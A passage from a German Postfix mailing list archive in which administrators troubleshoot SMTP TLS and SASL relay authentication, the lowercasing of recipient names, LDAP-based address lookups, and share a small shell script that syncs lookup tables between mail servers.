<474FB9DD.8080806@tuxolino.net> <20071130082223.GJ12941@mail.incertum.net> <20071130095725.GA7310@state-of-mind.de> Message-ID: <474FE2CE.9050003@tuxolino.net> Patrick Ben Koetter schrieb: > * Stefan Förster : > >> * "Michael G. Schmidt" wrote: >> >>> Bei meiner Installation scheint cyrus-sasl2 automatisch tls zu >>> verwenden, so dass meine Authentifikation nicht akzeptiert wird. >>> Versucht dies zu aendern habe ich in der '/etc/default/saslauthd' und in >>> der /etc/postfix/main.cf. Leider ohne Erfolg. >>> Kann mir jemand einen Tipp geben wie ich dieses Problem loesen koennte? >>> >> Obwohl ich nicht behaupten kann, das Problem zu verstehen: Dem >> SMTP-Client in Postfix gewöhnt man TLS ab 2.4 mit >> >> smtp_tls_security_level = never >> > > smtp_tls_security_level = none > > >> ab. Mehr dazu unter: http://www.postfix.org/TLS_README.html >> >> >>> Ciao >>> >> Stefan >> -- >> Stefan Förster http://www.incertum.net/ Public Key: 0xBBE2A9E9 >> FdI #318: MCSP - Doppelklickathleten. (Juergen P. Meier) >> -- >> _______________________________________________ >> Postfixbuch-users -- http://www.postfixbuch.de >> Heinlein Professional Linux Support GmbH >> >> Postfixbuch-users at listi.jpberlin.de >> https://listi.jpberlin.de/mailman/listinfo/postfixbuch-users >> > > Leider habe ich mich zu frueh gefreut. Die 'sent' Mitteilung galt fuer die interne Zustellung. Mit 'smtp_tls_security_level=never' kam die Meldung 'deferred', mit '...=none' wird die Mail leider wieder 'bounced'. Ciao, Michael From jk at jkart.de Fri Nov 30 11:15:40 2007 From: jk at jkart.de (Jim Knuth) Date: Fri, 30 Nov 2007 11:15:40 +0100 Subject: [Postfixbuch-users] (OT) ERROR: Malformed database In-Reply-To: References: <474DBEE1.9070204@jkart.de><474E585B.6030501@inpho.de> <474EB4FA.60804@jkart.de><474F3C8C.8080905@inpho.de> <474F3FC6.50408@jkart.de> Message-ID: <474FE2CC.8060108@jkart.de> Am 30.11.2007 9:53 Uhr, schrieb Morais Oliver: >> es gibt keinen Dämon. Ist ein Script, was von Cron in X Abstand >> ausgeführt wird. > > Wenn X hinreichend klein ist läuft das Skript vielleicht ein > zweites mal los während die vorherige Instanz noch aktiv ist? > Passiert dann "zufällig" wenn die Maschine einfach mal mehr > zu tun und das Skript so länger läuft? > > Nur so als schnelle Idee. > > Gruß, > Oliver ok, werd mal den zeitlichen Abstand erhöhen. Danke. -- mit freundlichem Gruss - with kind regard Jim Knuth #ICQ 277289867 From lars at brainlift.de Fri Nov 30 11:30:03 2007 From: lars at brainlift.de (lars) Date: Fri, 30 Nov 2007 11:30:03 +0100 Subject: [Postfixbuch-users] Grossbuchstaben in Usernamen Message-ID: hallo, liste, mal ne frage am rande: gibt es eine möglichkeit, Postfix daran zu hindern, empfängernamen auf kleinbuchstaben zu setzen? es ist sicher ohnehin nicht sehr sinnvoll, user-XX@ statt user-xx@ zu verwenden; wenn ich aber einen benutzeraccount mit grossbuchstaben habe, gibt postfix mir eine "User unknown"-meldung, weil es aus user- XX user-xx macht und den nicht in den tables findet - da steht ja auch user-XX ... danke im voraus und gruss lars behrens From pinguin at tuxolino.net Fri Nov 30 11:34:01 2007 From: pinguin at tuxolino.net (Michael G. Schmidt) Date: Fri, 30 Nov 2007 11:34:01 +0100 Subject: [Postfixbuch-users] Grossbuchstaben in Usernamen In-Reply-To: References: Message-ID: <474FE719.8090307@tuxolino.net> lars schrieb: > hallo, liste, > > > mal ne frage am rande: gibt es eine möglichkeit, Postfix daran zu > hindern, empfängernamen auf kleinbuchstaben zu setzen? > > es ist sicher ohnehin nicht sehr sinnvoll, user-XX@ statt user-xx@ zu > verwenden; wenn ich aber einen benutzeraccount mit grossbuchstaben > habe, gibt postfix mir eine "User unknown"-meldung, weil es aus user- > XX user-xx macht und den nicht in den tables findet - da steht ja > auch user-XX ... > > > > danke im voraus und gruss > > > > lars behrens > Hallo Lars, ich bin zwar alles andere als ein postfix-Profi, aber kannst Du da nicht in Deiner Alias-Table einen Eintrag hinterlegen? Oder hast Du so viele XX -USER? Gruss, Michael From mhaegele at linuxrocks.dyndns.org Fri Nov 30 11:56:06 2007 From: mhaegele at linuxrocks.dyndns.org (Matthias Haegele) Date: Fri, 30 Nov 2007 11:56:06 +0100 Subject: [Postfixbuch-users] Grossbuchstaben in Usernamen In-Reply-To: References: Message-ID: <474FEC46.2040805@linuxrocks.dyndns.org> lars schrieb: > hallo, liste, > > > mal ne frage am rande: gibt es eine möglichkeit, Postfix daran zu > hindern, empfängernamen auf kleinbuchstaben zu setzen? > > es ist sicher ohnehin nicht sehr sinnvoll, user-XX@ statt user-xx@ zu > verwenden; wenn ich aber einen benutzeraccount mit grossbuchstaben > habe, gibt postfix mir eine "User unknown"-meldung, weil es aus user- > XX user-xx macht und den nicht in den tables findet - da steht ja > auch user-XX ... Interessehalber: Kommen die Usernamen aus einer Windows-Umgebung oder wer macht den Unsinn? Ansonsten könnte man eine Ersetzung durchführen [A-Z] nach [a-z] sollte ja gehen mit einem Script. hth -- Grüsse/Greetings MH Dont send mail to: ubecatcher at linuxrocks.dyndns.org -- From oliver.morais at akhwien.at Fri Nov 30 11:53:25 2007 From: oliver.morais at akhwien.at (Morais Oliver) Date: Fri, 30 Nov 2007 11:53:25 +0100 Subject: [Postfixbuch-users] (OT) ERROR: Malformed database In-Reply-To: <474FE2CC.8060108@jkart.de> References: <474DBEE1.9070204@jkart.de><474E585B.6030501@inpho.de> <474EB4FA.60804@jkart.de><474F3C8C.8080905@inpho.de> <474F3FC6.50408@jkart.de> <474FE2CC.8060108@jkart.de> Message-ID: > ok, werd mal den zeitlichen Abstand erhöhen. Danke. Ich würde eher so eine Art "Wrapper-Skript" bauen, dann hast du Dank "logger" auch die Info im Log ob/wann das passiert. Schnelle Idee, sicher verbesserungsfähig: if [ ! -z `pgrep $SKRIPTNAME` ]; then echo "Bereits aktiv" | logger -t "$SKRIPTNAME"; exit 1; else # Dein Skript ausführen. fi; Gruß, Oliver From lars at brainlift.de Fri Nov 30 12:29:36 2007 From: lars at brainlift.de (lars) Date: Fri, 30 Nov 2007 12:29:36 +0100 Subject: [Postfixbuch-users] Grossbuchstaben in Usernamen In-Reply-To: <474FEC46.2040805@linuxrocks.dyndns.org> References: <474FEC46.2040805@linuxrocks.dyndns.org> Message-ID: <8A038F95-97F4-4831-9BCE-7E2D134C967B@brainlift.de> moin, > ich bin zwar alles andere als ein postfix-Profi, aber kannst Du da > nicht > in Deiner Alias-Table einen Eintrag hinterlegen? Oder hast Du so viele > XX -USER? hey, daran habe ich gar nicht gedacht ;-) > Interessehalber: Kommen die Usernamen aus einer Windows-Umgebung oder > wer macht den Unsinn? meine windowslastigen kollegen. damit nicht unsere wenigen linuxserver wegen linuxphobien nicht auch noch abgeschafft werden, habe ich denen für die userpflege ein kleines script eingerichtet, und wenn die da stumpf "user-XX" einhacken, steht das erstmal so in der table drin. > Ansonsten könnte man eine Ersetzung durchführen [A-Z] nach [a-z] > sollte > ja gehen mit einem Script. script im script, oder so - OK. danke für die tipps. ein dramatisches problem ist es ja nicht; mich hätte interessiert, ob es ein verstecktes postfixfeature gibt, welches die lower-case-umsetzung unterbindet. ich habe keines gefunden, und nach fünf jahren auf postfix ist es mir jetzt das erstemal aufgefallen. gruss lars From cite at incertum.net Fri Nov 30 12:22:17 2007 From: cite at incertum.net (Stefan =?utf-8?Q?F=C3=B6rster?=) Date: Fri, 30 Nov 2007 12:22:17 +0100 Subject: [Postfixbuch-users] cyrus-sasl2 - hier: tls deaktivieren In-Reply-To: <474FE2CE.9050003@tuxolino.net> References: <474FB9DD.8080806@tuxolino.net> <20071130082223.GJ12941@mail.incertum.net> <20071130095725.GA7310@state-of-mind.de> <474FE2CE.9050003@tuxolino.net> Message-ID: <20071130112217.GK12941@mail.incertum.net> * "Michael G. Schmidt" wrote: > Leider habe ich mich zu frueh gefreut. Die 'sent' Mitteilung galt fuer > die interne Zustellung. Mit 'smtp_tls_security_level=never' kam die > Meldung 'deferred', mit '...=none' wird die Mail leider wieder 'bounced'. Sorry wegen der Verwechslung von "never" und "none". Aber hier, wie wäre es denn langsam mal mit Butter bei die Fische, also Logs und "postconf -n" und so? Ciao Stefan -- Stefan Förster http://www.incertum.net/ Public Key: 0xBBE2A9E9 FdI #135: Druckertreiber - pure virtual Araber (Martin Neumann) From pinguin at tuxolino.net Fri Nov 30 12:36:35 2007 From: pinguin at tuxolino.net (Michael G. Schmidt) Date: Fri, 30 Nov 2007 12:36:35 +0100 Subject: [Postfixbuch-users] cyrus-sasl2 - hier: tls deaktivieren In-Reply-To: <20071130112217.GK12941@mail.incertum.net> References: <474FB9DD.8080806@tuxolino.net> <20071130082223.GJ12941@mail.incertum.net> <20071130095725.GA7310@state-of-mind.de> <474FE2CE.9050003@tuxolino.net> <20071130112217.GK12941@mail.incertum.net> Message-ID: <474FF5C3.4060007@tuxolino.net> Stefan Förster schrieb: > * "Michael G. Schmidt" wrote: > >> Leider habe ich mich zu frueh gefreut. Die 'sent' Mitteilung galt fuer >> die interne Zustellung. Mit 'smtp_tls_security_level=never' kam die >> Meldung 'deferred', mit '...=none' wird die Mail leider wieder 'bounced'. >> > > Sorry wegen der Verwechslung von "never" und "none". Aber hier, wie > wäre es denn langsam mal mit Butter bei die Fische, also Logs und > "postconf -n" und so? > > > Ciao > Stefan > Hallo Stefan, kein Grund fuer Entschuldigung! ;) Ich danke fuer die Hilfe! Im Moment komme ich an mein echtes System nicht heran. Das geht erst heute Nachmittag wieder. Dann aber kommt die Butter ;). Kommst Du auch aus dem Norden? ;) Gruss, Michael From mhaegele at linuxrocks.dyndns.org Fri Nov 30 13:11:02 2007 From: mhaegele at linuxrocks.dyndns.org (Matthias Haegele) Date: Fri, 30 Nov 2007 13:11:02 +0100 Subject: [Postfixbuch-users] Grossbuchstaben in Usernamen In-Reply-To: <8A038F95-97F4-4831-9BCE-7E2D134C967B@brainlift.de> References: <474FEC46.2040805@linuxrocks.dyndns.org> <8A038F95-97F4-4831-9BCE-7E2D134C967B@brainlift.de> Message-ID: <474FFDD6.9070903@linuxrocks.dyndns.org> lars schrieb: > moin, > > >> ich bin zwar alles andere als ein postfix-Profi, aber kannst Du da >> nicht >> in Deiner Alias-Table einen Eintrag hinterlegen? Oder hast Du so viele >> XX -USER? > > hey, daran habe ich gar nicht gedacht ;-) > > >> Interessehalber: Kommen die Usernamen aus einer Windows-Umgebung oder >> wer macht den Unsinn? > > meine windowslastigen kollegen. Dacht ich mir doch. Sag denen dass sie das nicht machen sollten auch im Windowsumfeld gibt es Software die da Probleme haben könnte. (Auch sollte man imho die "Maximallänge der usernamen nicht ausschöpfen, hatte mal ein Riesenproblem bei einer Migration auf eine neue ERP/CRM-Software das "Mapping" der Windows-Usernamen auf die Usernamen der Datenbank-SW hinzubiegen die nur 10Stellen beim usernamen zuliess). Immer feste auf die Finger klopfen ;-). > damit nicht unsere wenigen linuxserver wegen linuxphobien nicht auch > noch abgeschafft werden, habe ich denen für die userpflege ein > kleines script eingerichtet, und wenn die da stumpf "user-XX" > einhacken, steht das erstmal so in der table drin. Ich leide mit dir, kommt mir sehr bekannt vor ... >> Ansonsten könnte man eine Ersetzung durchführen [A-Z] nach [a-z] >> sollte >> ja gehen mit einem Script. > > script im script, oder so - OK. > > > danke für die tipps. ein dramatisches problem ist es ja nicht; mich > hätte interessiert, ob es ein verstecktes postfixfeature gibt, > welches die lower-case-umsetzung unterbindet. > > > ich habe keines gefunden, und nach fünf jahren auf postfix ist es mir > jetzt das erstemal aufgefallen. Afair nicht (zumindest nicht über einen Konfigurationsparameter postfix). Ich meinte das schwirrte schonmal auf der Liste herum: http://listi.jpberlin.de/pipermail/postfixbuch-users/2006-October/028398.html > gruss > > > > lars -- Grüsse/Greetings MH Dont send mail to: ubecatcher at linuxrocks.dyndns.org -- From Postfix at TMI-RZ.de Fri Nov 30 13:29:20 2007 From: Postfix at TMI-RZ.de (Thomas Stiefel) Date: Fri, 30 Nov 2007 13:29:20 +0100 Subject: [Postfixbuch-users] LDAP-Lookup und Ausfallsicherheit In-Reply-To: <20071129105014.GD14023@state-of-mind.de> References: <474D3E93.7040207@TMI-RZ.de> <20071129073659.GB10093@state-of-mind.de> <474E83A2.2050100@TMI-RZ.de> <20071129105014.GD14023@state-of-mind.de> Message-ID: <47500220.3050301@TMI-RZ.de> Patrick Ben Koetter schrieb: > * Thomas Stiefel : > > Kommt darauf an, wo Du die Daten dumpst. Auf der Domino-Kiste weis ich es > nicht. Auf dem Postfix Server kannst Du einen lokalen OpenLDAP laufen lassen > (Variante C...) und die Daten dort live abfragen oder mit ldapsearch dumpen > und dann mit awk oder PERL extrahieren. > Es ist eigentlich relativ egal wo gedumpt wird, denn auch der Domino-Server ist ein Linux-System. Der einzigste Nachteil beim beim Domino-Server ist, dass er wegen dem Lotus-Support auf einem alten SLES 8 System läuft. Der Vorteil von einem Dump auf dem Domino-Server wäre, dass nur einmal gedumpt und gefiltert werden müsste und man könnte dann die Hash-DB mit rsync auf die einzelnen Postfix Server synchronisieren anstatt auf jedem Postfix Server selbst zu dumpen und filtern. Ansonsten hört sich das mit dem Dump und AWK schon mal ganz gut aus. Ich habe allerdings null Erfahrung mit ldapsearch und den Abfragen dafür. Gibt es hierfür eine gute Doku? Danke und Gruß Tom From Postfix at TMI-RZ.de Fri Nov 30 13:33:55 2007 From: Postfix at TMI-RZ.de (Thomas Stiefel) Date: Fri, 30 Nov 2007 13:33:55 +0100 Subject: [Postfixbuch-users] LDAP-Lookup und Ausfallsicherheit In-Reply-To: <474E946D.1040002@japantest.homelinux.com> References: <474D3E93.7040207@TMI-RZ.de> <474E946D.1040002@japantest.homelinux.com> Message-ID: <47500333.3020202@TMI-RZ.de> Hallo Sandy, Sandy Drobic schrieb: > So hatte ich das auch gelöst. Dem Postfixserver den Zugriff auf LDAP > gestatten und per cron ein Script aufrufen, welches die gültigen User und > Domains zusammenstellt. Dann kann ich den Server auch mehrere Stunden > abschalten, ohne das Mails abgewiesen werden. Zusätzlich werden neue User > automatisch übernommen, die Konfiguration der Accounts findet also nur auf > dem Dominoserver statt. > Genau darum geht es ja, dass man nicht doppelt die Accounts pflegen muss. Wäre es vielleicht möglich, dass Du mir das Script zur Verfügung stellst, damit ich nicht von ganz vorne anfangen und erstmal lernen muss LDAP zu verstehen ;-) Danke und Gruß Tom From christian at bricart.de Fri Nov 30 13:44:58 2007 From: christian at bricart.de (Christian Bricart) Date: Fri, 30 Nov 2007 13:44:58 +0100 (CET) Subject: [Postfixbuch-users] Grossbuchstaben in Usernamen In-Reply-To: References: Message-ID: <44412.80.87.162.65.1196426698.squirrel@aachalon.de> lars wrote: > hallo, liste, > > > mal ne frage am rande: gibt es eine möglichkeit, Postfix daran zu > hindern, empfängernamen auf kleinbuchstaben zu setzen? > > es ist sicher ohnehin nicht sehr sinnvoll, user-XX@ statt user-xx@ zu > verwenden; wenn ich aber einen benutzeraccount mit grossbuchstaben > habe, gibt postfix mir eine "User unknown"-meldung, weil es aus user- > XX user-xx macht und den nicht in den tables findet - da steht ja > auch user-XX ... völlig unabhängig von der Sinnhaftigkeit im local-part der Mail-Adresse eine Case Unterscheidung zu *praktizieren*, sagt: RFC 2821: .. >> The local-part of a mailbox MUST BE treated as case sensitive. Therefore, >> SMTP implementations MUST take care to preserve the case of mailbox >> local-parts. Mailbox domains are not case sensitive. In particular, for >> some hosts the user "smith" is different from the user "Smith". However, >> exploiting the case sensitivity of mailbox local-parts impedes >> interoperability and is discouraged. .. Damit würde ich doch sagen, dass sich Postfix mit der Umschreibung nicht RFC-konform verhält.. my 0.02 Euros Christian From Postfix at TMI-RZ.de Fri Nov 30 14:00:14 2007 From: Postfix at TMI-RZ.de (Thomas Stiefel) Date: Fri, 30 Nov 2007 14:00:14 +0100 Subject: [Postfixbuch-users] Gueltige Adressen auf Backup-MX -wie automatisieren? In-Reply-To: <63908DA348933441A6FB2AB998ED894F0196E1@dcex01.2nibbles4u.local> References: <000901c83112$ca0ef790$5e2ce6b0$@com> <474E8D23.7000609@TMI-RZ.de> <63908DA348933441A6FB2AB998ED894F0196E1@dcex01.2nibbles4u.local> Message-ID: <4750095E.1010008@TMI-RZ.de> Christian Scholz schrieb: > Ich würde mich über das Script freuen ;-) > Da ich hier aus Zeitmangel leider nicht so oft lesen kann, post ich einfach mal das Script direkt auf die Liste, damit andere später auch noch was davon haben. Es war zwar auch eine quick & dirty Aktion, aber es funktioniert. ---------->8 schnipp ---------- MHOST=master # Rechner mit Master-config CFGDIR=/etc/postfix/my_maps # Verzeichnis mit Lookup-Tables RSYNC=/usr/bin/rsync # Pfad zu rsync PMAP=/usr/sbin/postmap # Pfad zu postmap PFIX=/usr/sbin/postfix # Pfad zu postfix echo "Postfix Lookup-Tables werden von $MHOST geholt ..." $RSYNC -av -e ssh --exclude=*.db root@$MHOST:$CFGDIR/ $CFGDIR RCSYNC=$? if [ $RCSYNC != 0 ] then echo "!!! Fehler beim holen der Lookup-Tables ==> ABBRUCH !!!" exit 1 fi echo "Datenbanken fuer Postfix Lookup-Tables werden neu aufgebaut ..." $PMAP $CFGDIR/*[!.db] RCMAP=$? if [ $RCMAP != 0 ] then echo "!!! Fehler beim Neuaufbau der Lookup-Tables ==> ABBRUCH !!!" exit 1 fi f_info "Postfix-Konfiguration wird neu geladen ..." $PFIX reload ---------- schnapp 8<---------- Viel Spaß damit. Gruß Tom From pinguin at tuxolino.net Fri Nov 30 14:51:45 2007 From: pinguin at tuxolino.net (pinguin at tuxolino.net) Date: Fri, 30 Nov 2007 14:51:45 +0100 (CET) Subject: [Postfixbuch-users] smtp-Auth Message-ID: <34044.87.122.137.152.1196430705.squirrel@www.tuxolino.net> Hallo Liste, jetzt bin ich an meinem 'richtigen' System. Mein Problem ist immer noch das Gleiche, meine Versuche zur smtp-Authentifzierung werden abgelehnt. Meine /var/log/mail.log: tail /var/log/mail.log Nov 30 14:40:45 localhost postfix/pickup[3159]: DE6FE2B6CB: uid=1000 from= Nov 30 14:40:45 localhost postfix/cleanup[4020]: DE6FE2B6CB: message-id=<20071130134045.GA4012 at tuxolino.net> Nov 30 14:40:46 localhost postfix/qmgr[3160]: DE6FE2B6CB: from=, size=428, nrcpt=1 (queue active) Nov 30 14:40:46 localhost postfix/smtp[4022]: DE6FE2B6CB: to=, relay=mail.tuxolino.net[89.246.255.36]:25, delay=0.5, delays=0.17/0.17/0.1/0.06, dsn=5.7.1, status=bounced (host mail.tuxolino.net[89.246.255.36] said: 550 5.7.1 ... Relaying denied. Proper authentication required. (in reply to RCPT TO command)) Nov 30 14:40:46 localhost postfix/cleanup[4020]: 572AC2B6CC: message-id=<20071130134046.572AC2B6CC at localhost> Nov 30 14:40:46 localhost postfix/qmgr[3160]: 572AC2B6CC: from=<>, size=2289, nrcpt=1 (queue active) Nov 30 14:40:46 localhost postfix/bounce[4023]: DE6FE2B6CB: sender non-delivery notification: 572AC2B6CC Nov 30 14:40:46 localhost postfix/qmgr[3160]: DE6FE2B6CB: removed Nov 30 14:40:46 localhost postfix/local[4024]: 572AC2B6CC: to=, relay=local, delay=0.09, delays=0.01/0.03/0/0.05, dsn=2.0.0, status=sent (delivered to command: procmail -a "$EXTENSION") Nov 30 14:40:46 localhost postfix/qmgr[3160]: 572AC2B6CC: removed Meine /etc/postfix/main.cf sieht wie folgt aus: #myorigin = /etc/mailname smtpd_banner = $myhostname ESMTP $mail_name (Debian/GNU) biff = no # appending .domain is the MUA's job. append_dot_mydomain = no # Uncomment the next line to generate "delayed mail" warnings #delay_warning_time = 4h # TLS parameters smtpd_tls_cert_file=/etc/ssl/certs/ssl-cert-snakeoil.pem smtpd_tls_key_file=/etc/ssl/private/ssl-cert-snakeoil.key smtpd_use_tls=no smtpd_tls_session_cache_database = btree:${queue_directory}/smtpd_scache smtp_tls_session_cache_database = btree:${queue_directory}/smtp_scache smtpd_sasl_auth_enable=yes smtpd_sasl_security_options=noanonymous smtpd_tls_auth_only=no smtpd_sasl_local_domain=test-tux broken_sasl_auth_clients=yes # See /usr/share/doc/postfix/TLS_README.gz in the postfix-doc package for # information on enabling SSL in the smtp client. myhostname = localhost alias_maps = hash:/etc/aliases alias_database = hash:/etc/aliases myorigin = /etc/mailname mydestination = tuxolino.net, localhost, localhost.localdomain, localhost relayhost = [mail.tuxolino.net] mynetworks = 127.0.0.0/8 mailbox_command = procmail -a "$EXTENSION" mailbox_size_limit = 0 recipient_delimiter = + inet_interfaces = all smtp_sasl_auth_enable=yes smtp_sasl_password_maps=hash:/etc/postfix/sasl_passwd smtp_sasl_security_options=noanonymous smtp_tls_security_level=none Stephan fragte noch nach der Ausgabe eines postmap-Kommandos. Leider kenne ich mich damit gar nicht aus und werde aus der man-page nicht so recht schlau. Gruss, Michael From driessen at fblan.de Fri Nov 30 15:17:48 2007 From: driessen at fblan.de (Uwe Driessen) Date: Fri, 30 Nov 2007 15:17:48 +0100 Subject: [Postfixbuch-users] smtp-Auth In-Reply-To: <34044.87.122.137.152.1196430705.squirrel@www.tuxolino.net> References: <34044.87.122.137.152.1196430705.squirrel@www.tuxolino.net> Message-ID: <000a01c8335b$c953c510$0565a8c0@uwe> pinguin at tuxolino.net schrieb: > Hallo Liste, jetzt bin ich an meinem 'richtigen' System. > Mein Problem ist immer noch das Gleiche, meine Versuche zur > smtp-Authentifzierung werden abgelehnt. > > Meine /var/log/mail.log: > tail /var/log/mail.log > Nov 30 14:40:45 localhost postfix/pickup[3159]: DE6FE2B6CB: uid=1000 > from= > Nov 30 14:40:45 localhost postfix/cleanup[4020]: DE6FE2B6CB: > message-id=<20071130134045.GA4012 at tuxolino.net> > Nov 30 14:40:46 localhost postfix/qmgr[3160]: DE6FE2B6CB: > from=, size=428, nrcpt=1 (queue active) > Nov 30 14:40:46 localhost postfix/smtp[4022]: DE6FE2B6CB: > to=, relay=mail.tuxolino.net[89.246.255.36]:25, > delay=0.5, delays=0.17/0.17/0.1/0.06, dsn=5.7.1, status=bounced (host > mail.tuxolino.net[89.246.255.36] said: 550 5.7.1 ... > Relaying denied. Proper authentication required. (in reply to RCPT TO > command)) Und wo ist das auth ? wo wird das abgelehnt? Mal ein Schuß ins Blaue dein Outlook meldet sich gar nicht erst an bzw. versucht sich überhaupt nicht anzumelden (keine Übermittlung von User und PW). > Nov 30 14:40:46 localhost postfix/cleanup[4020]: 572AC2B6CC: > message-id=<20071130134046.572AC2B6CC at localhost> > Nov 30 14:40:46 localhost postfix/qmgr[3160]: 572AC2B6CC: from=<>, > size=2289, nrcpt=1 (queue active) > Nov 30 14:40:46 localhost postfix/bounce[4023]: DE6FE2B6CB: sender > non-delivery notification: 572AC2B6CC > Nov 30 14:40:46 localhost postfix/qmgr[3160]: DE6FE2B6CB: removed > Nov 30 14:40:46 localhost postfix/local[4024]: 572AC2B6CC: > to=, relay=local, delay=0.09, > delays=0.01/0.03/0/0.05, dsn=2.0.0, status=sent (delivered to command: > procmail -a "$EXTENSION") > Nov 30 14:40:46 localhost postfix/qmgr[3160]: 572AC2B6CC: removed > > Meine /etc/postfix/main.cf sieht wie folgt aus: > > Stephan fragte noch nach der Ausgabe eines postmap-Kommandos. Leider kenne > ich mich damit gar nicht aus und werde aus der man-page nicht so recht Nein der fragte dich nach der Ausgabe von postconf -n Und bitte auch noch die master.cf OHNE KOMENTARE Wenn du kein TLS benutzt dann wirf es erstmal raus die Kiste sollte erstmal Ohne TLS sauber rennen sonst hast du noch mehr Baustellen > schlau. > Gruss, > Michael Mit freundlichen Grüßen Drießen -- Software & Computer Uwe Drießen Lembergstraße 33 67824 Feilbingert Tel.: 06708 / 660045 Fax: 06708 / 661397 From cite at incertum.net Fri Nov 30 15:19:58 2007 From: cite at incertum.net (Stefan =?utf-8?Q?F=C3=B6rster?=) Date: Fri, 30 Nov 2007 15:19:58 +0100 Subject: [Postfixbuch-users] smtp-Auth In-Reply-To: <34044.87.122.137.152.1196430705.squirrel@www.tuxolino.net> References: <34044.87.122.137.152.1196430705.squirrel@www.tuxolino.net> Message-ID: <20071130141958.GM12941@mail.incertum.net> * pinguin at tuxolino.net wrote: > to=, relay=mail.tuxolino.net[89.246.255.36]:25, > delay=0.5, delays=0.17/0.17/0.1/0.06, dsn=5.7.1, status=bounced (host > mail.tuxolino.net[89.246.255.36] said: 550 5.7.1 ... > Relaying denied. Proper authentication required. (in reply to RCPT TO > command)) Dein Postfix versucht anscheinend nichtmal, eine Authentifizierung vorzunehmen. > relayhost = [mail.tuxolino.net] > smtp_sasl_password_maps=hash:/etc/postfix/sasl_passwd Steht in /etc/postfix/sasl_passwd der Hostname genauso drin wie in "relayhost", also mit eckigen Klammern? Buest guess: "postconf -e debug_peer_list=mail.tuxolino.net" ausführen, "postfix reload" hinterherschicken, Mail nochmal absenden und im Debug-Output schaun, warum er kein AUTH machen mag. Ich wette 2 Cent auf fehlende sasl2-modules, scheint ja Debian zu sein, oder? Ciao Stefan -- Stefan Förster http://www.incertum.net/ Public Key: 0xBBE2A9E9 25 Zeichen, daß Du erwachsen bist, Nummer 23: 90% der Zeit, die Du vor dem Computer verbringst, ist für Deine Arbeit. From Basti03 at gmx.de Fri Nov 30 15:27:14 2007 From: Basti03 at gmx.de (Basti03 at gmx.de) Date: Fri, 30 Nov 2007 15:27:14 +0100 Subject: [Postfixbuch-users] smtp-Auth In-Reply-To: <34044.87.122.137.152.1196430705.squirrel@www.tuxolino.net> References: <34044.87.122.137.152.1196430705.squirrel@www.tuxolino.net> Message-ID: <20071130142714.74600@gmx.net> -------- Original-Nachricht -------- > Datum: Fri, 30 Nov 2007 14:51:45 +0100 (CET) > Von: pinguin at tuxolino.net > An: postfixbuch-users at listi.jpberlin.de > Betreff: [Postfixbuch-users] smtp-Auth > Hallo Liste, jetzt bin ich an meinem 'richtigen' System. > Mein Problem ist immer noch das Gleiche, meine Versuche zur > smtp-Authentifzierung werden abgelehnt. > > Meine /var/log/mail.log: > tail /var/log/mail.log > Nov 30 14:40:45 localhost postfix/pickup[3159]: DE6FE2B6CB: uid=1000 > from= > Nov 30 14:40:45 localhost postfix/cleanup[4020]: DE6FE2B6CB: > message-id=<20071130134045.GA4012 at tuxolino.net> > Nov 30 14:40:46 localhost postfix/qmgr[3160]: DE6FE2B6CB: > from=, size=428, nrcpt=1 (queue active) > Nov 30 14:40:46 localhost postfix/smtp[4022]: DE6FE2B6CB: > to=, relay=mail.tuxolino.net[89.246.255.36]:25, > delay=0.5, delays=0.17/0.17/0.1/0.06, dsn=5.7.1, status=bounced (host > mail.tuxolino.net[89.246.255.36] said: 550 5.7.1 ... > Relaying denied. Proper authentication required. (in reply to RCPT TO > command)) > Nov 30 14:40:46 localhost postfix/cleanup[4020]: 572AC2B6CC: > message-id=<20071130134046.572AC2B6CC at localhost> > Nov 30 14:40:46 localhost postfix/qmgr[3160]: 572AC2B6CC: from=<>, > size=2289, nrcpt=1 (queue active) > Nov 30 14:40:46 localhost postfix/bounce[4023]: DE6FE2B6CB: sender > non-delivery notification: 572AC2B6CC > Nov 30 14:40:46 localhost postfix/qmgr[3160]: DE6FE2B6CB: removed > Nov 30 14:40:46 localhost postfix/local[4024]: 572AC2B6CC: > to=, relay=local, delay=0.09, > delays=0.01/0.03/0/0.05, dsn=2.0.0, status=sent (delivered to command: > procmail -a "$EXTENSION") > Nov 30 14:40:46 localhost postfix/qmgr[3160]: 572AC2B6CC: removed > > Meine /etc/postfix/main.cf sieht wie folgt aus: > #myorigin = /etc/mailname > > smtpd_banner = $myhostname ESMTP $mail_name (Debian/GNU) > biff = no > > # appending .domain is the MUA's job. > append_dot_mydomain = no > > # Uncomment the next line to generate "delayed mail" warnings > #delay_warning_time = 4h > > # TLS parameters > smtpd_tls_cert_file=/etc/ssl/certs/ssl-cert-snakeoil.pem > smtpd_tls_key_file=/etc/ssl/private/ssl-cert-snakeoil.key > smtpd_use_tls=no > smtpd_tls_session_cache_database = btree:${queue_directory}/smtpd_scache > smtp_tls_session_cache_database = btree:${queue_directory}/smtp_scache > smtpd_sasl_auth_enable=yes > smtpd_sasl_security_options=noanonymous > smtpd_tls_auth_only=no > smtpd_sasl_local_domain=test-tux > broken_sasl_auth_clients=yes > > # See /usr/share/doc/postfix/TLS_README.gz in the postfix-doc package for > # information on enabling SSL in the smtp client. > > myhostname = localhost > alias_maps = hash:/etc/aliases > alias_database = hash:/etc/aliases > myorigin = /etc/mailname > mydestination = tuxolino.net, localhost, localhost.localdomain, localhost > relayhost = [mail.tuxolino.net] ^^^^^^^^^^^^^^^^^ Wenn ichs richtig verstanden habe hast du nen eigenen nicht öffentlichen Mailserver der zu versatel relayen soll, also sollte da der smtp von Versatel stehen und nicht dein Server... > mynetworks = 127.0.0.0/8 > mailbox_command = procmail -a "$EXTENSION" > mailbox_size_limit = 0 > recipient_delimiter = + > inet_interfaces = all > > smtp_sasl_auth_enable=yes > smtp_sasl_password_maps=hash:/etc/postfix/sasl_passwd > smtp_sasl_security_options=noanonymous > smtp_tls_security_level=none > > Stephan fragte noch nach der Ausgabe eines postmap-Kommandos. Leider kenne > ich mich damit gar nicht aus und werde aus der man-page nicht so recht > schlau. > Gruss, > Michael > > -- > _______________________________________________ > Postfixbuch-users -- http://www.postfixbuch.de > Heinlein Professional Linux Support GmbH > > Postfixbuch-users at listi.jpberlin.de > https://listi.jpberlin.de/mailman/listinfo/postfixbuch-users Gruß -- Psssst! Schon vom neuen GMX MultiMessenger gehört? Der kann`s mit allen: http://www.gmx.net/de/go/multimessenger From tv at solnet.ch Fri Nov 30 15:24:27 2007 From: tv at solnet.ch (Thomas Vogt) Date: Fri, 30 Nov 2007 15:24:27 +0100 Subject: [Postfixbuch-users] Hat Postfix probleme mit Exchange Server? "lost connection with "while sending MAIL FROM) 